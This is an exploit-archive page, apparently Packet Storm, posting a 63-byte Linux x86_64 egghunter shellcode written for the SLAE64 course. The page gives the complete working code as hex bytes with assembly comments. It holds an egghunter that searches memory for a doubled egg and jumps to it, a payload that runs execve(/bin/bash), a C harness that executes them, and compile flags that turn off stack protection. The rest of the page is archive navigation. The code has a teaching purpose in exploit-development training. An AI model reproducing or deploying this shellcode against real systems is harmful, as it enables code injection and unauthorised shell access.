what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Linux/x64_86 Egghunter Execve Shellcode

Linux/x64_86 Egghunter Execve Shellcode
Posted Apr 24, 2020
Authored by Bobby Cooke

63 bytes small Linux/x64_86 dynamic egghunter shellcode that searches memory for 2 instances of the egg. When the eggs are found, the egghunter passes execution control to the payload at the memory address of the eggs. The payload is an execve(/bin/bash) shellcode.

tags | shellcode, bash
systems | linux
SHA-256 | c3ff54b357a821a1566c2d7a70204024eb13af4cdf6c240a1725a87696156951

Linux/x64_86 Egghunter Execve Shellcode

Change Mirror Download
// Shellcode Title:  Linux/x64 - EggHunter Execve Shellcode (63 Bytes)
// Shellcode Author: Bobby Cooke
// Tested On: Kali Linux 5.3.0-kali3-amd64 x86_64
// Description: Egghunter for Linux x64_86 systems. The egghunter dynamically searchs memory for 2 instances of the egg. When the eggs are found, the egghunter passes execution control to the payload at the memory address of the eggs. The payload is an execve(/bin/bash) shellcode.
// SLAE/Student ID: PA-10913
// Course: This shellcode was created for the x86_64 Assembly Language and Shellcoding on Linux (SLAE64) Course offered at pentesteracademy.com.
// Shoutout: skape, vivek, offsec, corelan
// Filename: Hunter.c
// Usage:
// root# gcc -m64 -z execstack -fno-stack-protector Hunter.c -o Hunter
// root# echo $$ | xargs ps
// PID TTY STAT TIME COMMAND
// 13916 pts/4 Ss 0:00 /bin/bash
// root# ./Hunter
// Memory Location of Shellcode: 0x555555558060
// Memory Location of EggHunter: 0x5555555580a0
// Size of Egghunter: 63
// root# echo $$ | xargs ps
// PID TTY STAT TIME COMMAND
// 14495 pts/4 S 0:00 [bash]

#include <stdio.h>
#include <string.h>
// This is the egg for our eggHunter
// the egg should be 4 bytes and be executable
#define egg "\x90\x50\x90\x50"

unsigned char shellcode[] = \
egg \
egg \
"\x48\x31\xf6" // xor rsi, rsi
"\x48\xf7\xe6" // mul rsi ; rdx&rax= 0x0
"\x48\x31\xff" // xor rdi, rdi
"\x57" // push rdi
"\x48\x83\xc2\x68" // add rdx, 0x68
"\x52" // push rdx
"\x48\xba\x2f\x62\x69\x6e\x2f\x62\x61\x73" // movabs rdx, 0x7361622f6e69622f ; "/bin/bas"
"\x52" // push rdx
"\x48\x31\xd2" // xor rdx, rdx
"\x48\x89\xe7" // mov rdi, rsp ; rdi = Pointer -> "/bin/bash"0x00
"\xb0\x3b" // mov al, 0x3b ; execve syscall number
"\x0f\x05"; // syscall ; call execve("/bin/bash", NULL, NULL)

// Replace the hardcoded egg with a variable.
// This allows us to easily change the egg for our eggHunter.
unsigned char egghunter[] = \
"\x48\x31\xc9" // xor rcx, rcx
"\x48\xf7\xe1" // mul rcx
"\x48\x81\xc2\x10\x10\x55\x55" // add rdx, 0x55551010 ; Start >0 (hopefully reduce time)
"\x48\xc1\xe2\x10" // shl rdx, 0x10 ; 0x55551010 => 0x555510100000
// nextPage:
"\x66\x81\xca\xff\x0f" // or dx, 0xfff ; 0xfff = 4096. Size of page
// nextAddress:
// ; int link(const char *oldpath, const char *newpath);
"\x48\xff\xc2" // inc rdx
"\x48\x8d\x7a\x08" // lea rdi, [rdx+0x8] ; ARG1=*oldpath
"\x48\x31\xf6" // xor rsi, rsi ; ARG2=*newpath
"\x48\x31\xc0" // xor rax, rax ; reset rax for syscall
"\x04\x56" // add al, 0x56 ; System Call for link()
"\x0f\x05" // syscall ; Executes link()
"\x3c\xf2" // cmp al, 0xf2 ; Can memory address be read?
"\x74\xe6" // jz nextPage ; If no, check the next memory page
"\x48\x31\xdb" // xor rbx, rbx
"\x81\xc3\x90\x50\x90\x50" // add ebx, 0x50905090 ; Configure Egg in RBX
"\x39\x1a" // cmp [rdx], ebx ; Egg?
"\x75\xde" // jnz nextAddress ; No Egg? Go to next memory page
"\x39\x5a\x04" // cmp [rdx+0x4], ebx ; second Egg?
"\x75\xd9" // jnz nextAddress ; No Egg? Check next memory address
"\xff\xe2"; // jmp rdx ; EGG FOUND! Jump to Egg!

int main()
{
printf("Memory Location of Shellcode: %p\n", shellcode);
printf("Memory Location of EggHunter: %p\n", egghunter);
printf("Size of Egghunter: %d\n", strlen(egghunter));
int (*ret)() = (int(*)())egghunter;
ret();
}
Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    30 Files
  • 27
    Sep 27th
    27 Files
  • 28
    Sep 28th
    8 Files
  • 29
    Sep 29th
    14 Files
  • 30
    Sep 30th
    19 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close